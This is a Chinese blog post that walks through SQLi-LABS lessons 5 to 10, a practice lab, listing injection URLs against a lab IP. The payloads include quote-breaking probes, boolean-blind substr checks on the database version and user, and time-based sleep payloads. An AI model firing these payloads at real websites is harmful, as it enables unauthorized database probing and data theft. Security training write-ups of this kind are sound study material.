zoukankan      html  css  js  c++  java

  • SQLi-LABS Page-1(Basic Challenges) Less5-Less10

    Less5

    GET - Double Injection - Single Quotes

    http://10.10.202.112/sqli/Less-5?id=1

    http://10.10.202.112/sqli/Less-5?id=1'

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

    http://10.10.202.112/sqli/Less-5?id=1"

    You are in........... 

    猜测SQL语句为:

    select login_name,password from table_name where id='$id' limit 0,1

    构造payload

    http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false

    http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true

    Less-6 

    GET - Double Injection - Double Quotes

    http://10.10.202.112/sqli/Less-6?id=1"

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

    猜测SQL语句应该为:

    select login_name,password from table_name where id="$id" limit 0,1

    http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false

    http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true

    http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s

    Less-7

    GET - Dump into outfile - String

    看了源码SQL语句为:

    SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1

    构造payload

    http://10.10.202.112/sqli/Less-7?id=1'))  and sleep(5) -- -

    http://10.10.202.112/sqli/Less-7?id=1'))  and substr(@@version,1,1)=4--+ #false

    http://10.10.202.112/sqli/Less-7?id=1'))  and substr(@@version,1,1)=5--+ #true

    Less-8

    GET - Blind - Boolian Based - Single Quotes

    http://10.10.202.112/sqli/Less-8?id=1' #false

    http://10.10.202.112/sqli/Less-8?id=1'--+ #true

    猜测SQL:

    SELECT * FROM users WHERE id='$id' LIMIT 0,1

    http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false

    http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true

    Less-9

    GET - Blind - Time based. - Single Quotes

    源代码SQL

    SELECT * FROM users WHERE id='$id' LIMIT 0,1

    payload:

    http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+

    http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+

    Less-10

    GET - Blind - Time based - double quotes

    http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+

    http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+

     待续。。。

    点击赞赏二维码,您的支持将鼓励我继续创作!
  • 相关阅读:
    img标签与span一起使用不在同一条线上
    媒体查询
    section标签实现文字滚动
    js活jQuery实现动态添加、移除css/js文件
    页面中动态改变浏览器标题
    css清浮动与动态计算元素宽度
    js实现60s倒计时效果
    js与es6中获取时间戳
    JavaScript中实现小数点后保留2位
    GMT时间转换
  • 原文地址:https://www.cnblogs.com/hack404/p/11045748.html
Copyright © 2011-2022 走看看